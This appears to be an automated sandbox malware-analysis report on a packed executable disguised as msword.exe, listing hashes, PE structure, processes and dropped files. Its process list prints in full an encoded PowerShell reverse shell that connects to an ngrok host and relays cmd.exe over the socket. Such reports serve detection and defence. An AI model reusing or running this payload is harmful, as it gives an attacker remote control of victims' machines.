analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

msword.exe

Full analysis: https://app.any.run/tasks/5e23b561-2c48-4d03-8c93-fb2fba068e17
Verdict: Malicious activity
Analysis date: September 30, 2020, 12:56:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
MD5:

F8D732DC73063BC7D4607813308CF6B9

SHA1:

39DE76D6DED0C3020E41E5F2B4D3B42BA15A2A34

SHA256:

739C82D2D84B96CA0BE3707C28078CD2486DE1AC0DAEF32050170446F46F726E

SSDEEP:

384:PlAtOTJMiOd+/X9GjcX/5PwxEVppNsp/x0C6aNJawcudoD7UEOk5D+HeWtg:Pl3lWdUM4FXYpaCLnbcuyD7UEOkee2g

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2468)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • msword.exe (PID: 3220)
    • Creates files in the user directory

      • powershell.exe (PID: 252)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | UPX compressed Win32 Executable (64.1)
.dll | Win32 Dynamic Link Library (generic) (15.5)
.exe | Win32 Executable (generic) (10.6)
.exe | Generic Win/DOS Executable (4.7)
.exe | DOS Executable Generic (4.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:03:21 11:26:43+01:00
PEType: PE32
LinkerVersion: 2.5
CodeSize: 20480
InitializedDataSize: 4096
UninitializedDataSize: 36864
EntryPoint: 0xd570
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 21-Mar-2018 10:26:43
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x00000080

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 3
Time date stamp: 21-Mar-2018 10:26:43
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
UPX0
0x00001000
0x00009000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
UPX1
0x0000A000
0x00005000
0x00004200
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
7.84458
.rsrc
0x0000F000
0x00001000
0x00000600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
5.08138

Resources

Title
Entropy
Size
Codepage
Language
Type
1
4.8674
874
UNKNOWN
English - United States
RT_MANIFEST

Imports

COMCTL32.DLL
GDI32.DLL
KERNEL32.DLL
MSVCRT.dll
OLE32.DLL
SHELL32.DLL
SHLWAPI.DLL
USER32.DLL
WINMM.DLL
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msword.exe no specs msword.exe cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2080"C:\Users\admin\AppData\Local\Temp\msword.exe" C:\Users\admin\AppData\Local\Temp\msword.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
3220"C:\Users\admin\AppData\Local\Temp\msword.exe" C:\Users\admin\AppData\Local\Temp\msword.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
4294770688
2468"C:\Windows\system32\cmd.exe" /c "C:\Users\admin\AppData\Local\Temp\1\ADB6.tmp.bat C:\Users\admin\AppData\Local\Temp\msword.exe"C:\Windows\system32\cmd.exemsword.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294770688
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
252powershell -executionpolicy bypass -noprofile -windowstyle hidden -EncodedCommand ("cG93ZXJzaGVsbCAtdyBoaWRkZW4gLW5vcCAtYyAkYT0nMi50Y3Aubmdyb2suaW8nOyRiPTExNDkzOyRjPU5ldy1PYmplY3Qgc3lzdGVtLm5ldC5zb2NrZXRzLnRjcGNsaWVudDskbmI9TmV3LU9iamVjdCBTeXN0ZW0uQnl0ZVtdICRjLlJlY2VpdmVCdWZmZXJTaXplOyRvYj1OZXctT2JqZWN0IFN5c3RlbS5CeXRlW10gNjU1MzY7JGViPU5ldy1PYmplY3QgU3lzdGVtLkJ5dGVbXSA2NTUzNjskZT1uZXctb2JqZWN0IFN5c3RlbS5UZXh0LlVURjhFbmNvZGluZzskcD1OZXctT2JqZWN0IFN5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzOyRwLlN0YXJ0SW5mby5GaWxlTmFtZT0nY21kLmV4ZSc7JHAuU3RhcnRJbmZvLlJlZGlyZWN0U3RhbmRhcmRJbnB1dD0xOyRwLlN0YXJ0SW5mby5SZWRpcmVjdFN0YW5kYXJkT3V0cHV0PTE7JHAuU3RhcnRJbmZvLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj0xOyRwLlN0YXJ0SW5mby5Vc2VTaGVsbEV4ZWN1dGU9MDskcT0kcC5TdGFydCgpOyRpcz0kcC5TdGFuZGFyZElucHV0OyRvcz0kcC5TdGFuZGFyZE91dHB1dDskZXM9JHAuU3RhbmRhcmRFcnJvcjskb3NyZWFkPSRvcy5CYXNlU3RyZWFtLkJlZ2luUmVhZCgkb2IsIDAsICRvYi5MZW5ndGgsICRudWxsLCAkbnVsbCk7JGVzcmVhZD0kZXMuQmFzZVN0cmVhbS5CZWdpblJlYWQoJGViLCAwLCAkZWIuTGVuZ3RoLCAkbnVsbCwgJG51bGwpOyRjLmNvbm5lY3QoJGEsJGIpOyRzPSRjLkdldFN0cmVhbSgpO3doaWxlICgkdHJ1ZSkgeyAgICBzdGFydC1zbGVlcCAtbSAxMDA7ICAgIGlmICgkb3NyZWFkLklzQ29tcGxldGVkIC1hbmQgJG9zcmVhZC5SZXN1bHQgLW5lIDApIHsgICAgICAkcj0kb3MuQmFzZVN0cmVhbS5FbmRSZWFkKCRvc3JlYWQpOyAgICAgICRzLldyaXRlKCRvYiwwLCRyKTsgICAgICAkcy5GbHVzaCgpOyAgICAgICRvc3JlYWQ9JG9zLkJhc2VTdHJlYW0uQmVnaW5SZWFkKCRvYiwgMCwgJG9iLkxlbmd0aCwgJG51bGwsICRudWxsKTsgICAgfSAgICBpZiAoJGVzcmVhZC5Jc0NvbXBsZXRlZCAtYW5kICRlc3JlYWQuUmVzdWx0IC1uZSAwKSB7ICAgICAgJHI9JGVzLkJhc2VTdHJlYW0uRW5kUmVhZCgkZXNyZWFkKTsgICAgICAkcy5Xcml0ZSgkZWIsMCwkcik7ICAgICAgJHMuRmx1c2goKTsgICAgICAkZXNyZWFkPSRlcy5CYXNlU3RyZWFtLkJlZ2luUmVhZCgkZWIsIDAsICRlYi5MZW5ndGgsICRudWxsLCAkbnVsbCk7ICAgIH0gICAgaWYgKCRzLkRhdGFBdmFpbGFibGUpIHsgICAgICAkcj0kcy5SZWFkKCRuYiwwLCRuYi5MZW5ndGgpOyAgICAgIGlmICgkciAtbHQgMSkgeyAgICAgICAgICBicmVhazsgICAgICB9IGVsc2UgeyAgICAgICAgICAkc3RyPSRlLkdldFN0cmluZygkbmIsMCwkcik7ICAgICAgICAgICRpcy53cml0ZSgkc3RyKTsgICAgICB9ICAgIH0gICAgaWYgKCRjLkNvbm5lY3RlZCAtbmUgJHRydWUgLW9yICgkYy5DbGllbnQuUG9sbCgxLFtTeXN0ZW0uTmV0LlNvY2tldHMuU2VsZWN0TW9kZV06OlNlbGVjdFJlYWQpIC1hbmQgJGMuQ2xpZW50LkF2YWlsYWJsZSAtZXEgMCkpIHsgICAgICAgIGJyZWFrOyAgICB9ICAgIGlmICgkcC5FeGl0Q29kZSAtbmUgJG51bGwpIHsgICAgICAgIGJyZWFrOyAgICB9fQ==")C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
4294770688
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
269
Read events
210
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6A7E9D9ZALLF00TDU2CG.temp
MD5:
SHA256:
252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1aaf4c.TMPbinary
MD5:36FE326E12493E805B62142553A1E43C
SHA256:3DD6ACC81930940EC26CE9794D473AC8869FCDB0D48BC71A20C27D80FF693B9F
3220msword.exeC:\Users\admin\AppData\Local\Temp\1\ADB6.tmp.battext
MD5:738CA81F328BF01D73B86CC81E74DE02
SHA256:2776D43F72DD4F431FF2BCC0C1BC028E9E4376CE9303E0DBFCDA6D785F1CD991
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info